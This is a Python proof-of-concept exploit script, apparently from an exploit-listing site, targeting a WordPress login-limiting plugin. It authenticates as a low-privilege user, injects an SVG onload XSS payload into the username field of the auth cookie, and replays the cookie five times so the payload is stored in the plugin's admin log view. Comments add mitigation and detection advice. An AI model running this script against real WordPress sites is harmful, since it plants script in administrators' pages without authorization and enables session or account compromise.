## https://sploitus.com/exploit?id=WPEX-ID:461CBCCA-AED7-4C92-BA35-EBABF4FCD810
import requests
import sys
import re
# Proof-of-concept: an authenticated low-privilege user rewrites the username
# segment of their own WordPress auth cookie so that it carries HTML markup,
# then replays the tampered cookie against /wp-admin/. The closing message
# points at the limit-login-attempts settings page, so the plugin presumably
# records the username from the rejected cookie and renders it in its log view
# without output escaping (stored XSS) -- confirm against the advisory.
#
# Defender notes:
#   * Mitigation: upgrade the plugin to a fixed release, and make sure any
#     logged username is escaped at render time (e.g. esc_html()).
#   * Detection: auth cookies whose username field contains '<' or '>' never
#     occur in legitimate traffic and are worth alerting on at the WAF/proxy.
#
# NOTE(review): the page this listing was taken from lost all indentation; the
# nesting below (five GETs issued once, after the cookie rewrite loop) is
# reconstructed from the comments and should be checked against the original.

if len(sys.argv) != 4:
    print('USAGE: python %s <target_url> <user_login> <user_pass>' % (sys.argv[0],))
    sys.exit()

# Normalise the base URL so path concatenation does not produce '//'.
url = sys.argv[1].rstrip('/')

# Matches cookie names where hex digits follow 'wordpress_' directly; names
# such as 'wordpress_logged_in_...' or 'wordpress_test_cookie' do not match.
auth_cookie_pattern = re.compile(r'wordpress_[0-9a-f]+')

with requests.Session() as session:
    print('Logging in...')

    # Authenticate with the supplied (Subscriber-level) credentials. The test
    # cookie header mirrors what a browser sends so WordPress accepts the login.
    login_form = {
        'log': sys.argv[2],
        'pwd': sys.argv[3],
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': 1,
    }
    login_response = session.post(
        url + '/wp-login.php',
        headers={'Cookie': 'wordpress_test_cookie=WP Cookie check'},
        data=login_form,
    )

    print('Sending corrupted cookies 5 times..')

    # Swap the real login name inside each matching auth cookie for a marker
    # string containing markup. The cookie's signature no longer matches, so
    # WordPress will treat every request carrying it as a failed cookie auth.
    for cookie_name in session.cookies.keys():
        if not auth_cookie_pattern.match(cookie_name):
            continue
        original_value = session.cookies.get(name=cookie_name, path='/')
        tampered_value = original_value.replace(
            sys.argv[2], 'MALICIOUS_USERNAME<svg/onload=alert(1)//>')
        # Setting the value to None drops the old cookie before re-adding it.
        session.cookies.set(name=cookie_name, value=None, path='/')
        session.cookies.set(name=cookie_name, value=tampered_value, path='/')

    # Each request is one rejected cookie authentication from this client.
    for _ in range(5):
        session.get(url + '/wp-admin/')

    print(f'View limit-login-attempts logs now at {sys.argv[1]}/wp-admin/options-general.php?page=limit-login-attempts')